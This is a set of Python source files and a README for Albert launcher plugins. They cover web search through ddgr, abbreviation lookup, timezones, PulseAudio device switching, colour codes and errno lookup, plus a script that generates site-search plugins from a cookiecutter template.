data = f.readline().strip().split()[0]
return data
def setup(query) -> bool:
"""setup is successful if an empty list is returned.
Use this function if you need the user to provide you data
"""
results = []
if not shutil.which("ddgr"):
results.append(
v0.Item(
id=md_name,
icon=[icon_path],
text='"ddgr" is not installed.',
subtext='Please install and configure "ddgr" accordingly.',
actions=[
UrlAction(
'Open "ddgr" installation instructions',
"https://github.com/jarun/ddgr#installation=",
)
],
)
)
query.add(results)
return True
return False
# helpers for backwards compatibility ---------------------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name: str, copy_text: str):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name: str, command):
super().__init__(name, name, command)
# main plugin class ---------------------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "{{ cookiecutter.trigger }} "
def synopsis(self):
return "query text."
def initialize(self):
# Called when the extension is loaded (ticked in the settings) - blocking
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
results = []
try:
# setup stage ---------------------------------------------------------------------
did_setup = setup(query)
if did_setup:
return
query_str = query.string.strip()
# too small request - don't even send it.
if len(query_str) < 2:
return
# determine if we can make the request --------------------------------------------
if not query_str.endswith("."):
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="typing...",
subtext='Add a dot to the end of the query "." to trigger the search',
actions=[],
),
)
return
query_str = query_str[:-1].strip()
# proceed, fill the results then query.add that only at the end -------------------
# send request
json_results, stderr = query_ddgr(query_str)
ddgr_results = [
get_ddgr_result_as_item(ddgr_result) for ddgr_result in json_results
]
results.extend(ddgr_results)
if not results:
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="No results.",
subtext=stderr if stderr else "",
actions=[],
),
)
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
<file_sep>"""User-defined abbreviations read/written a file."""
import hashlib
import traceback
from pathlib import Path
from typing import Dict, Tuple
import gi
from fuzzywuzzy import process
gi.require_version("Notify", "0.7") # isort:skip
gi.require_version("GdkPixbuf", "2.0") # isort:skip
from gi.repository import GdkPixbuf, Notify # isort:skip
import albert as v0
md_name = "User-defined abbreviations read/written a file"
md_description = "TODO"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/abbr"
icon_path = str(Path(__file__).parent / "abbr")
cache_path = Path(v0.cacheLocation()) / "abbr"
config_path = Path(v0.configLocation()) / "abbr"
data_path = Path(v0.dataLocation()) / "abbr"
abbr_store_fname = config_path / "fname"
abbr_store_sep = config_path / "separator"
abbreviations_path = Path()
abbr_latest_hash = ""
abbr_latest_d: Dict[str, str] = {}
abbr_latest_d_bi: Dict[str, str] = {}
split_at = ":"
# plugin main functions -----------------------------------------------------------------------
if abbr_store_fname.is_file():
with open(abbr_store_fname, "r") as f:
p = Path(f.readline().strip()).expanduser()
if not p.is_file():
raise FileNotFoundError(p)
abbreviations_path = p
if abbr_store_sep.is_file():
with open(abbr_store_sep, "r") as f:
sep = f.read(1)
if not sep:
raise RuntimeError(f"Invalid separator: {sep}")
split_at = sep
def save_abbr(name: str, desc: str):
with open(abbreviations_path, "a") as f:
li = f"\n* {name}: {desc}"
f.write(li)
# supplementary functions ---------------------------------------------------------------------
def notify(
msg: str,
app_name: str = md_name,
image=str(icon_path),
):
Notify.init(app_name)
n = Notify.Notification.new(app_name, msg, image)
n.show()
def get_abbr_as_item(abbr: Tuple[str, str]):
"""Return the abbreviation pair as an item - ready to be appended to the items list and be rendered by Albert."""
text = abbr[0].strip()
subtext = abbr[1].strip()
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{text}",
subtext=f"{subtext}",
actions=[
UrlAction("Open in Google", f"https://www.google.com/search?&q={text}"),
ClipAction("Copy abbreviation", text),
ClipAction("Copy description", subtext),
],
)
def sanitize_string(s: str) -> str:
return s.replace("<", "<")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
def submit_fname(p: Path):
p = p.expanduser().resolve()
if p.is_file():
with open(abbr_store_fname, "w") as f:
f.write(str(p))
global abbreviations_path
abbreviations_path = p
else:
notify(f"Given file path does not exist -> {p}")
def submit_sep(c: str):
if len(c) > 1:
notify("Separator must be a single character!")
return
with open(abbr_store_sep, "w") as f:
f.write(c)
global split_at
split_at = c
def setup(query) -> bool:
"""Setup is successful if an empty list is returned.
Use this function if you need the user to provide you data
"""
query_str = query.string
# abbreviations file
if not abbr_store_fname.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify file to read/write abbreviations to/from",
subtext="Paste the path to the file, then press ENTER",
actions=[
FuncAction("Submit path", lambda p=query_str: submit_fname(Path(p))),
],
)
)
return True
if not abbr_store_sep.is_file():
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Specify separator *character* for abbreviations",
subtext=f"Separator: {query_str}",
actions=[
FuncAction("Submit separator", lambda c=query_str: submit_sep(c)),
],
)
)
return True
return False
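# Expected abbreviations-file format: one entry per line, the two sides split
# at `split_at` and leading "*" markers stripped - e.g. with ":" as separator:
#   * afaik: as far as I know
#   * iirc: if I recall correctly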
def make_latest_dict(conts: list):
d = {}
for li in conts:
tokens = li.split(split_at, maxsplit=1)
if len(tokens) == 2:
# avoid cases where one of the two sides is essentially empty
if any([not t for t in tokens]):
continue
tokens = [t.strip().strip("*") for t in tokens]
d[tokens[0]] = tokens[1]
return d
def hash_file(p: Path) -> str:
h = hashlib.sha256()
with open(p) as f:
h.update(f.read().encode("utf-8"))
return h.hexdigest()
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "ab "
def synopsis(self):
return "abbreviation to look for"
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query):
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
results_setup = setup(query)
if results_setup:
return
query_str = query.string
if len(query_str.strip().split()) == 0:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="[new] Add a new abbreviation",
subtext="new <u>abbreviation</u> <u>description</u>",
completion=f"{query.trigger} new ",
)
)
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Write more to query the database",
subtext="",
completion=query.trigger,
)
)
return
# new behavior
tokens = query_str.split()
if len(tokens) >= 1 and tokens[0] == "new":
if len(tokens) > 1:
name = tokens[1]
else:
name = ""
if len(tokens) > 2:
desc = " ".join(tokens[2:])
else:
desc = ""
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text=f"New abbreviation: {name}",
subtext=f"Description: {desc}",
actions=[
FuncAction(
"Save abbreviation to file",
lambda name=name, desc=desc: save_abbr(name, desc),
)
],
)
)
return
curr_hash = hash_file(abbreviations_path)
global abbr_latest_hash, abbr_latest_d, abbr_latest_d_bi
if abbr_latest_hash != curr_hash:
abbr_latest_hash = curr_hash
with open(abbreviations_path) as f:
conts = f.readlines()
abbr_latest_d = make_latest_dict(conts)
abbr_latest_d_bi = abbr_latest_d.copy()
abbr_latest_d_bi.update({v: k for k, v in abbr_latest_d.items()})
if not abbr_latest_d:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text=f'No lines split by "{split_at}" in the file provided',
actions=[
ClipAction(
"Copy provided filename",
str(abbreviations_path),
)
],
)
)
return
# do fuzzy search on both the abbreviations and their description
matched = process.extract(query_str, abbr_latest_d_bi.keys(), limit=10)
for m in [elem[0] for elem in matched]:
if m in abbr_latest_d.keys():
query.add(get_abbr_as_item((m, abbr_latest_d[m])))
else:
query.add(get_abbr_as_item((abbr_latest_d_bi[m], m)))
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep># timezones - Albert plugin
## Prerequisites
Make sure you have the following python packages installed:
- `Pillow`
- `pytz`
- `requests`
- `tzlocal`
- `thefuzz`
- `pycountry`
## Description
Look up time zones based on either the city or the country name. The plugin
will autocomplete all the appropriate city and country names based on fuzzy
search, and will always show your local country/city and timezone on top so
that you can easily compare.
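At its core the comparison is straightforward; a rough sketch using the
libraries above (city hard-coded for illustration):

```
from datetime import datetime

import pytz
from tzlocal import get_localzone

now_local = datetime.now(get_localzone())
now_athens = datetime.now(pytz.timezone("Europe/Athens"))
print(f"local: {now_local:%H:%M} | Athens: {now_athens:%H:%M}")
```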
Thanks to <https://flagpedia.net/> for the country logos
## Demo


## Installation instructions
Refer to the parent project: [Awesome albert plugins](https://github.com/bergercookie/awesome-albert-plugins)
## Self Promotion
If you find this tool useful, please [star it on Github](https://github.com/bergercookie/awesome-albert-plugins)
## TODO List
See [ISSUES list](https://github.com/bergercookie/awesome-albert-plugins/issues) for the things that
I'm currently either working on or interested in implementing in the near
future. In case there's something you are interested in working on, don't
hesitate to either ask for clarifications or just do it and directly make a PR.
<file_sep>#!/usr/bin/env python3
"""
Create an albert python plugin for each one of the specified websites.
Uses the `ddgr` tool for the actual search.
"""
import os
import re
import secrets
import shutil
from pathlib import Path, PurePosixPath
from typing import Optional
import requests
from cookiecutter.main import cookiecutter
# globals -------------------------------------------------------------------------------------
# Get all the websites that work with ddgr or manually specify websites to create a plugin
# for.
generate_plugins_only_for = [
"alternativeto",
"amazon",
"askubu",
"aur.archlinux",
"bbc",
"cambridge",
"cnn",
"cracked",
"crunchbase",
"distrowatch",
"dpkg",
"ebay",
"facebook",
"github",
"gnu",
"hackaday",
"howstuffworks",
"imdb",
"kernel",
"last",
"linkedin",
"linux",
"man7",
"mdn",
"opensubtitles",
"quora",
"reddit",
"rottentomatoes",
"rpmfind",
"sourceforge",
"stackoverflow",
"ted",
"torrentz2",
"twitter",
"vim",
"wikipedia",
"wikiquote",
"yahoo",
]
custom_plugins = {
"search_acronyms": {"ddgr_at": "https://www.allacronyms.com", "trigger": "acro"},
"search_amazon": {
"trigger": "ama",
"ddgr_at": "amazon.co.uk",
"show_on_top_no_trigger": True,
},
"search_cmake": {
"trigger": "cmake",
"ddgr_at": "cmake.org",
},
"search_ros2": {
"trigger": "ros2",
"ddgr_at": "docs.ros2.org/",
"show_on_top_no_trigger": False,
},
"search_cambridge_dictionary": {
"ddgr_at": "dictionary.cambridge.org",
"trigger": "cam",
},
"search_cppreference": {"trigger": "cpp", "ddgr_at": "en.cppreference.com"},
"search_devhints": {"ddgr_at": "devhints.io", "trigger": "dev"},
"search_dlib": {"ddgr_at": "dlib.net", "trigger": "dlib"},
"search_ddgr": {"trigger": "dd", "ddgr_at": "", "show_on_top_no_trigger": True},
"search_kivy": {"trigger": "kv", "ddgr_at": "kivy.org"},
"search_mdn": {
"ddgr_at": "https://developer.mozilla.org/en-US/docs/Web",
"trigger": "mdn",
},
"search_numpy": {"ddgr_at": "numpy.org/doc", "trigger": "np"},
"search_opencv": {"ddgr_at": "docs.opencv.org", "trigger": "cv2"},
"search_patreon": {"trigger": "patreon", "ddgr_at": "patreon.com"},
"search_pydocs": {"ddgr_at": "docs.python.org", "trigger": "pydocs"},
"search_pypi": {"ddgr_at": "pypi.org", "trigger": "pypi"},
"search_qt5_docs": {"ddgr_at": "doc.qt.io/qt-5", "trigger": "qt5"},
"search_rust": {"ddgr_at": "https://doc.rust-lang.org", "trigger": "ru"},
"search_rustcreates": {"ddgr_at": "https://docs.rs", "trigger": "rc"},
"search_scihub": {"ddgr_at": "sci-hub.tw", "trigger": "sci"},
"search_scipy": {"ddgr_at": "docs.scipy.org", "trigger": "sp"},
"search_ubuntu": {"ddgr_at": "https://packages.ubuntu.com", "trigger": "ubu"},
"search_urbandictionary": {"ddgr_at": "urbandictionary.com", "trigger": "ud"},
"search_ikea": {"ddgr_at": "ikea.com", "trigger": "ik"},
"search_wikipedia": {
"ddgr_at": "en.wikipedia.org",
"trigger": "w",
"show_on_top_no_trigger": True,
},
"search_wikiquote": {"ddgr_at": "en.wikiquote.org", "trigger": "quote"},
"search_youtube": {
"trigger": "yt",
"ddgr_at": "youtube.com",
"url_handler": "mpv",
"url_handler_check_cmd": "which mpv && which youtube-dl",
"url_handler_description": "Launch using mpv",
"show_on_top_no_trigger": True,
},
"search_cssreference_io": {
"ddgr_at": "cssreference.io",
"trigger": "css",
},
"search_octopart": {
"ddgr_at": "octopart.com",
"trigger": "octo",
},
}
# generate_plugins_only_for = []
# supplementary methods -----------------------------------------------------------------------
def get_plugin_name_wo_search(plugin_name):
return plugin_name[len("search_") :]
def parse_ddgr_at_line(line: str):
"""Parse lines of this form:
alias @zdnet='ddgr -w zdnet.com'\n
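which, for the example above, returns ("zdnet", "zdnet.com", "zdnet").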
"""
tokens = line.strip().split()
ddgr_at = tokens[-1][:-1]  # ignore the trailing "'" at the end of the line
plugin_name = ddgr_at.split(".")[0]
res = re.search("@(.*)=", line)
if res is None:
trigger = None
else:
trigger = res.groups()[0]
return plugin_name, ddgr_at, trigger
def ddgr_plugins() -> dict:
res = requests.get(
"https://raw.githubusercontent.com/jarun/googler/master/auto-completion/googler_at/googler_at"
)
alias_lines = [
l for l in res.text.splitlines() if "alias" in l and not l.lstrip().startswith("#")
]
ddgr_plugins = {}
for l in alias_lines:
plugin_name, ddgr_at, trigger = parse_ddgr_at_line(l)
if trigger is None:
continue
plugin_name = "_".join(["search", plugin_name])
ddgr_plugins[plugin_name] = {"ddgr_at": ddgr_at, "trigger": trigger}
# user-specified filter
if generate_plugins_only_for:
ddgr_plugins = {
g[0]: g[1]
for g in ddgr_plugins.items()
if get_plugin_name_wo_search(g[0]) in generate_plugins_only_for
}
return ddgr_plugins
def get_cookiecutter_directives(
plugin_name,
trigger,
ddgr_at,
url_handler,
url_handler_description,
url_handler_check_cmd,
show_on_top_no_trigger,
):
github_user = "bergercookie"
cookiecutter_directives = {
"author": "<NAME>",
"plugin_name": plugin_name,
"trigger": trigger,
"ddgr_at": ddgr_at,
"url_handler": url_handler,
"url_handler_description": url_handler_description,
"url_handler_check_cmd": url_handler_check_cmd,
"github_user": github_user,
"repo_base_url": f"https://github.com/{github_user}/awesome-albert-plugins/blob/master/plugins/",
"download_url_base": f"https://raw.githubusercontent.com/{github_user}/awesome-albert-plugins/master/plugins/{plugin_name}/",
"plugin_short_description": f'{plugin_name.split("_")[1].capitalize()}: Search suggestions for {plugin_name.split("_")[1].capitalize()}',
"show_on_top_no_trigger": show_on_top_no_trigger,
"albert_plugin_interface": "v0.2",
"version": "0.1.0",
}
return cookiecutter_directives
# main ----------------------------------------------------------------------------------------
def main(): # noqa
# setup -----------------------------------------------------------------------------------
cookiecutter_orig_path = Path(__file__).parent / "plugins" / "search_template"
assert cookiecutter_orig_path.is_dir(), f"No such directory -> {cookiecutter_orig_path}"
def get_logo(plugin_name) -> Optional[Path]:
"""Get the corresponding logo or None if the latter is not found."""
path_to_logos = Path(__file__).parent / "ddgr_logos"
all_logos = [str(p) for p in path_to_logos.iterdir()]
        r = re.compile(
            rf"{str(path_to_logos / get_plugin_name_wo_search(plugin_name))}\.(png|jpg|svg)"
        )
matching_logos = list(filter(r.search, all_logos))
if len(matching_logos):
logo_path = Path(matching_logos[0])
else:
logo_path = Path(__file__).parent / "ddgr_logos" / "default.svg"
return logo_path
def get_output_dir(plugin_name) -> Path:
"""Get the output directory for the plugin at hand."""
return Path(__file__).parent / "plugins" / plugin_name
oldpwd = Path(".").absolute()
os.chdir(Path(__file__).parent)
# main functionality ----------------------------------------------------------------------
plugins = ddgr_plugins()
plugins.update(custom_plugins)
for plugin in plugins.items():
plugin_name = plugin[0]
trigger = plugin[1]["trigger"]
ddgr_at = plugin[1]["ddgr_at"]
url_handler = plugin[1].get("url_handler", "")
url_handler_description = plugin[1].get("url_handler_description", "")
url_handler_check_cmd = plugin[1].get("url_handler_check_cmd", "")
show_on_top_no_trigger = plugin[1].get("show_on_top_no_trigger", False)
print()
print("===============================================")
print(f"Generating plugin -> {plugin_name}")
print("===============================================")
print()
# create temporary template directory
random_int = secrets.randbits(32)
cookiecutter_tmp = PurePosixPath("/tmp") / f"albert-cookiecutter-{random_int}"
shutil.copytree(cookiecutter_orig_path, cookiecutter_tmp)
print(f"- Cookiecutter template directory -> {cookiecutter_tmp}")
print(f"- Plugin output directory-> {get_output_dir(plugin_name)}")
cookiecutter(
template=str(cookiecutter_tmp),
no_input=True,
overwrite_if_exists=True,
extra_context=get_cookiecutter_directives(
plugin_name=plugin_name,
trigger=trigger,
ddgr_at=ddgr_at,
url_handler=url_handler,
url_handler_description=url_handler_description,
url_handler_check_cmd=url_handler_check_cmd,
show_on_top_no_trigger=show_on_top_no_trigger,
),
output_dir=get_output_dir(plugin_name).parent,
)
# copy logo if exists
ext = get_logo(plugin_name).suffix
shutil.copy(get_logo(plugin_name), get_output_dir(plugin_name) / f"{plugin_name}{ext}")
# postprocessing --------------------------------------------------------------------------
os.chdir(oldpwd)
# TODO Remove temporary cookiecutter file and directories?
if __name__ == "__main__":
main()
<file_sep>"""PulseAudio - Set I/O Audio devices and Profile."""
import traceback
from pathlib import Path
from threading import Lock
from typing import Dict, List, Union
from fuzzywuzzy import process
from pulsectl import Pulse, pulsectl
from albert import *
md_iid = "0.5"
md_version = "0.2"
md_name = "PulseAudio - Set I/O Audio devices and profile"
md_description = "Switch between PulseAudio sources and sinks"
md_license = "BSD-2"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//pulse_control"
)
md_maintainers = "<NAME>"
md_lib_dependencies = ["pulsectl"]
pulse_lock = Lock()
src_icon_path = str(Path(__file__).parent / "source")
sink_icon_path = str(Path(__file__).parent / "sink")
config_icon_path = str(Path(__file__).parent / "configuration")
cache_path = Path(cacheLocation()) / "pulse_control"
config_path = Path(configLocation()) / "pulse_control"
data_path = Path(dataLocation()) / "pulse_control"
pulse = Pulse("albert-client")
class ClipAction(Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: setClipboardText(copy_text))
class FuncAction(Action):
def __init__(self, name, command):
super().__init__(name, name, command)
class Plugin(QueryHandler):
def id(self):
return __name__
def name(self):
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "p "
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> list:
"""Hook that is called by albert with *every new keypress*.""" # noqa
results = []
try:
query_str = query.string.strip()
            # avoid race conditions when multiple queries run simultaneously (i.e.,
            # the current and the previous query due to successive keystrokes)
            with pulse_lock:
                sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]] = [
                    *pulse.sink_list(),
                    *pulse.source_list(),
                ]
                cards: List[pulsectl.PulseCardInfo] = pulse.card_list()
if not query_str:
results.extend(self.render_noargs(query, sources_sinks, cards))
else:
results.extend(self.render_search(sources_sinks, cards, query))
except Exception: # user to report error
print(traceback.format_exc())
results.insert(
0,
Item(
id=self.name(),
icon=[],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
query.add(results)
def render_noargs(
self,
query,
sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]],
cards: List[pulsectl.PulseCardInfo],
) -> List[Item]:
"""Display current source, sink and card profiles."""
results = []
# active port for sources, sinks ----------------------------------------------------------
for s in sources_sinks:
# discard if it doesn't have any ports
if s.port_active is None:
continue
icon = sink_icon_path if is_sink(s) else src_icon_path
# fill actions
actions = [
FuncAction(p.description, lambda s=s, p=p: pulse.port_set(s, p))
for p in s.port_list
]
results.append(
Item(
id=self.name(),
icon=[icon],
text=s.port_active.description,
subtext=s.description,
completion=query.trigger,
actions=actions,
)
)
# active profile for each sound card ------------------------------------------------------
for c in cards:
actions = [
FuncAction(
prof.description, lambda c=c, prof=prof: pulse.card_profile_set(c, prof)
)
for prof in c.profile_list
]
results.append(
Item(
id=self.name(),
icon=[config_icon_path],
text=c.profile_active.description,
subtext=c.name,
completion=query.trigger,
actions=actions,
)
)
return results
def render_search(
self,
sources_sinks: List[Union[pulsectl.PulseSourceInfo, pulsectl.PulseSinkInfo]],
cards: List[pulsectl.PulseCardInfo],
query,
) -> List[Item]:
results = []
# sinks, sources
search_str_to_props: Dict[str, list] = {
p.description: [
sink_icon_path if is_sink(s) else src_icon_path,
s.description,
lambda s=s, p=p: pulse.port_set(s, p),
]
for s in sources_sinks
for p in s.port_list
}
# profiles
search_str_to_props.update(
{
prof.description: [
config_icon_path,
f"Profile | {c.name}",
lambda c=c, prof=prof: pulse.card_profile_set(c, prof),
]
for c in cards
for prof in c.profile_list
}
)
# add albert items
matched = process.extract(query.string, list(search_str_to_props.keys()), limit=10)
for m in [elem[0] for elem in matched]:
icon = search_str_to_props[m][0]
subtext = search_str_to_props[m][1]
action = FuncAction(m, search_str_to_props[m][2])
results.append(
Item(
id=self.name(),
icon=[icon],
text=m,
subtext=subtext,
completion=" ".join([query.trigger, query.string]),
actions=[action],
)
)
return results
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title} :" + s
return s
def is_sink(s):
return isinstance(s, pulsectl.PulseSinkInfo)
<file_sep>"""Visualise color codes."""
# TODO on color selection show
# RGB
# YCMK
# HSL
# Similar colors
import traceback
from pathlib import Path
from typing import Optional
import matplotlib.pyplot as plt
import numpy as np
import colour
from colour import Color
from fuzzywuzzy import process
import albert as v0
md_name = "Color codes visualisation"
md_description = "Color codes visualisation"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = "https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins/colors"
icon_path = str(Path(__file__).parent / "colors")
cache_path = Path(v0.cacheLocation()) / "colors"
config_path = Path(v0.configLocation()) / "colors"
data_path = Path(v0.dataLocation()) / "colors"
color_names = colour.COLOR_NAME_TO_RGB.keys()
h_values = [Color(c).get_hex() for c in color_names]
color_names_and_hex = list(color_names) + h_values
h_to_color_name = {h: c for h, c in zip(h_values, color_names)}
# supplementary functions ---------------------------------------------------------------------
def get_color_thumbnail(color: Color) -> Path:
"""
Retrieve the thumbnail of the given color. The output name will be the corresponding hex
strings. If the corresponding file does not exist, it will create it.
"""
fname = data_path / (str(color.get_hex_l()[1:]) + ".png")
if fname.exists():
if fname.is_file():
return fname
else:
raise FileNotFoundError(f"Thumbnail file exists but it's not a file -> {fname}")
# file not there - cache it
thumbnail_size = (50, 50)
rgb_triad = np.array([c * 255 for c in color.get_rgb()], dtype=np.uint8)
mat = np.zeros((*thumbnail_size, 3), dtype=np.uint8) + rgb_triad
plt.imsave(fname, mat)
return fname
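# Illustrative: get_color_thumbnail(Color("red")) caches and returns
# data_path / "ff0000.png" (the hex digits come from Color.get_hex_l()).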
def get_as_item(color):
"""Return an item - ready to be appended to the items list and be rendered by Albert."""
img_path = str(get_color_thumbnail(color))
rgb = [int(i * 255) for i in color.get_rgb()]
hl = color.get_hex_l()
if hl in h_to_color_name:
name = f" | {h_to_color_name[hl]}"
else:
name = ""
actions = [
ClipAction("Copy Hex (Long)", hl),
ClipAction("Copy RGB", f"{rgb}"),
ClipAction("Copy RGB [0, 1]", f"{color.get_rgb()}"),
]
h = color.get_hex()
if h != hl:
actions.insert(0, ClipAction("Copy Hex (Short)", h))
return v0.Item(
id=f"{md_name}_{hl}",
icon=[img_path],
text=f"{hl}{name}",
subtext=f"{rgb}",
actions=actions,
)
def get_as_color(s: str) -> Optional[Color]:
try:
c = Color(s)
return c
    except Exception:  # colour raises on unrecognized input
        return None
def sanitize_string(s: str) -> str:
    return s.replace("<", "&lt;")
def get_as_subtext_field(field, field_title=None) -> str:
"""Get a certain variable as part of the subtext, along with a title for that variable."""
s = ""
if field:
s = f"{field} | "
else:
return ""
if field_title:
s = f"{field_title}: " + s
return s
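# Illustrative: get_as_subtext_field("0.2", "version") -> "version: 0.2 | ",
# while an empty field yields "" so the subtext stays compact.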
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "col "
def synopsis(self):
return "some color description ..."
def initialize(self):
"""Called when the extension is loaded (ticked in the settings) - blocking."""
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
"""Hook that is called by albert with *every new keypress*.""" # noqa
try:
query_str = query.string.strip()
if not query_str:
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Give me color name, rgb triad or hex value",
subtext="supports fuzzy-search...",
)
)
return
# see if the name matches a color exactly
color = get_as_color(query_str)
if color:
query.add(get_as_item(color))
return
# no exact match
matched = process.extract(query_str, list(color_names_and_hex), limit=10)
query.add([get_as_item(Color(elem[0])) for elem in matched])
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Errno operations."""
import subprocess
import traceback
from pathlib import Path
from typing import Dict, Tuple
import albert as v0
md_name = "Errno lookup operations"
md_description = "Lookup error codes alongside their full name and description"
md_iid = "0.5"
md_version = "0.2"
md_maintainers = "<NAME>"
md_url = (
"https://github.com/bergercookie/awesome-albert-plugins/blob/master/plugins//errno_lookup"
)
md_bin_dependencies = ["errno"]
icon_path = str(Path(__file__).parent / "errno_lookup")
cache_path = Path(v0.cacheLocation()) / "errno_lookup"
config_path = Path(v0.configLocation()) / "errno_lookup"
data_path = Path(v0.dataLocation()) / "errno_lookup"
lines = [
li.split(maxsplit=2)
for li in subprocess.check_output(["errno", "--list"]).decode("utf-8").splitlines()
]
codes_d: Dict[str, Tuple[str, str]] = {li[1]: (li[0], li[2]) for li in lines}
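# Illustrative: an `errno --list` line like "EPERM 1 Operation not permitted"
# ends up as codes_d["1"] == ("EPERM", "Operation not permitted").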
# supplementary functions ---------------------------------------------------------------------
def get_as_item(t: Tuple[str, Tuple[str, str]]):
return v0.Item(
id=md_name,
icon=[icon_path],
text=f"{t[0]} - {t[1][0]}",
subtext=f"{t[1][1]}",
completion="",
actions=[],
)
def save_data(data: str, data_name: str):
"""Save a piece of data in the configuration directory."""
with open(config_path / data_name, "w") as f:
f.write(data)
def load_data(data_name) -> str:
"""Load a piece of data from the configuration directory."""
with open(config_path / data_name, "r") as f:
data = f.readline().strip().split()[0]
return data
# helpers for backwards compatibility ------------------------------------------
class UrlAction(v0.Action):
def __init__(self, name: str, url: str):
super().__init__(name, name, lambda: v0.openUrl(url))
class ClipAction(v0.Action):
def __init__(self, name, copy_text):
super().__init__(name, name, lambda: v0.setClipboardText(copy_text))
class FuncAction(v0.Action):
def __init__(self, name, command):
super().__init__(name, name, command)
# main plugin class ------------------------------------------------------------
class Plugin(v0.QueryHandler):
def id(self) -> str:
return __name__
def name(self) -> str:
return md_name
def description(self):
return md_description
def defaultTrigger(self):
return "err "
def synopsis(self):
return "error number or description ..."
def initialize(self):
# create plugin locations
for p in (cache_path, config_path, data_path):
p.mkdir(parents=False, exist_ok=True)
def finalize(self):
pass
def handleQuery(self, query) -> None:
try:
query_str: str = query.string
for item in codes_d.items():
if query_str in item[0]:
query.add(get_as_item(item))
else:
for v in item[1]:
if query_str.lower() in v.lower():
query.add(get_as_item(item))
break
except Exception: # user to report error
print(traceback.format_exc())
query.add(
v0.Item(
id=md_name,
icon=[icon_path],
text="Something went wrong! Press [ENTER] to copy error and report it",
actions=[
ClipAction(
f"Copy error - report it to {md_url[8:]}",
f"{traceback.format_exc()}",
)
],
),
)
<file_sep>"""Meme Generator - Generate memes with custom quotes - ready to be copied / uploaded / shared at an instant."""
